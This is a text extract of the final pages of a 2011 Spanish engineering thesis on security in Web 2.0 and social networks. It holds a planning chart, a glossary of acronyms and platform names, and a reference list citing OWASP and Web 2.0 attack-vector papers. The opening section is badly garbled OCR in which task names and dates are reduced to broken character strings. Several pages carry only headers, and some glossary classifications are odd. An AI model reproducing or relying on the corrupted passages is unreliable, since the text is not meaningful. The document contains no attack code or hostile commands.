,.• .,.<
Soft... on=Nidorc,
~"
11m:. l. fedla
s." , . ooge bi~li<>t,. fi.
d . lo UOM
"1<>'
1& ~ir><I "Y ~ n d<><n ~ ,
~ rt ,.. : lQgid..,ió n y
I',iv""id. d
"rr~ l ic""" i tl n " INA W ' op • l O!04
h n ""I_ . bi lidod. .
...·~b
R~,tru<tu , ,.; ó n d.
~ng ""j HyTo< noIo¡; i ..
-........
E. luo.l" d" U> 1I ,,~ióII
f_ _ YSGm. 11
- ~,-
l "ll c ni<ñ~ >O<ioly
,.•
e.toínd, ,, . d,, _ ~ , i ~ . d
l. .
cnente
R..,.t'lKru,«ién d.1 "" Á•• .,:"*"")
«ontenido d.1 PFC
C. <o< d ~ "><l _ .•' . .. "' . .....,,·..p ......!
l'l i. l"dón _ ¡....."" Áncebl' '''')
R""i<ió ntot.ld<>1
docum~n tc
Página 367
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
El ingeniero proyectista
Página 368
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
Glosario
AdobeAir Red social de Infraestructura&Almacenamiento
Adware Advertising-supported software
AEPD Agencia española de protección de datos
AJAX Asynchronous Javascript And XML
Alianzo Red social de tipo Comunidad
Amazon Red social de comercio electrónico
Amazon Video on Red social de Fotografía&Video
demand
Amazon Web Services Red social de Infraestructura&Almacenamiento
AmazonMP3 Red social de tipo Música&Sonido
Answers.com Red social de Búsquedas&Referencias
AOL/AIM Aplicación de Comunicaciones&Mensajería
API Application Programming Interface
ARP Address Resolution Protocol
ASCII code American Standard Code for Information Interchange
ASP Active Server Pages
ATOM Formato de redifusión ATOM
Atrapalo Red social de comercio electrónico
BaseCamp Red social de tipo Profesionales&Productividad
BBDD Bases de datos
BD Base de datos
BDD Bases de datos distribuidas
BeautifulPeople Red social para encontrar pareja
Bebo Red social de tipo Social
BGP Border Gateway Protocol
Bitacoras Red social de tipo comunidad
BitTorrent Red social de Infraestructura&Almacenamiento
BlackBerry OS Sistema operativo de BlackBerry
BlogTalkRadio Red social de tipo Música&Sonido
Booking Red social de comercio electrónico
Botnet Red de ordenadores zoombies
Box Red social de Infraestructura&Almacenamiento
Buzznet Red social de tipo Música&Sonido
Página 369
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
Página 370
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
Página 371
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
Página 372
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
Página 373
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
Página 374
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
Referencias
En este apartado se incluyen las referencias principales del proyecto. No todas las referencias
están incluidas aquí pero si durante todo el transcurso del proyecto haciendo referencia
específicamente a las partes donde están contenidas.
"Cultura y Tecnología en el nuevo entorno Tecnosocial" [Libro]. Profesor Fernando Sáez Vacas
de la Universidad Politécnica de Madrid..
[Diario El País] “¿Debemos fiarnos de Wikipedia?” del diario El País y de la autora Carmen
Pérez-Lanzac. [Internet].
<http://www.elpais.com/articulo/sociedad/Debemos/fiarnos/Wikipedia/elpepusoc/200
90610elpepisoc_1/Tes> [enero de 2010].
Página 375
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
[Aplicaciones Web 2.0] Artículo “La Web 2.0 y sus aplicaciones didácticas” [Internet]
<http://www.peremarques.net> [junio de 2009].
[CMS] “How to evaluate a content management system” por James Robertson, 2002.
[Internet]. <http://www.steptwo.com.au/papers/kmc_evaluate.> (enero de 2010).
[CMS] “Los CMS más utilizados por las grandes páginas” de SoyGik, informe
elaborado por Technorati, 2008. [Internet]. <http://www.soygik.com/los-cms-mas-
utilizados-por-las-grandes-paginas/.> (enero de 2010).
Página 376
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
[Ajax] “Ajax: A New Approach to Web Applications” por Jesse James. [Internet]
<http://www.adaptivepath.com/ideas/e000385> (marzo de 2010).
[Top 10 Attack Vector] “Top 10 Web 2.0 Attack Vectors” por Shreeraj Shah. Descarga de la
lista de InfosecWriters [Internet].
<http://www.infosecwriters.com/texts.php?op=display&id=518> (abril de 2010).
[Top 10 Web Attacks] “Top 10 Web Attacks” ataques web más frecuentes según el OWASP -
Open Web Aplication Security Project [Internet] <http://www.owasp.org/> (abril de 2010).
[Facebook] “Facebook Terrorista: La nueva arma del Ejército de EE.UU” por la web
CubaDebate [Internet] <http://www.cubadebate.cu/noticias/2009/08/19/facebook-terrorista-
la-nueva-arma-del-ejercito-de-los-estados-unidos/> (septiembre de 2010).
Página 377
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
[Conference data protection] 32nd International Conference of Data Protection and Privacy
Commissioners [Internet] <http://www.justice.gov.il/PrivacyGenerations> (septiembre de
2010).
[OpenID] Fundación OpenID en los Estados Unidos o desde su filian en Europa [Internet]
<http://www.openid.es/> <http://openid.net/> (enero de 2010).
[Seguridad 2.0] “Security in a Web 2.0 World” por C. Solari. Editorial Wiley [Libro] (marzo de
2010).
[Seguridad] “La Biblia del hacker” edición 2009. Editorial Anaya [Libro] (2010).
Página 378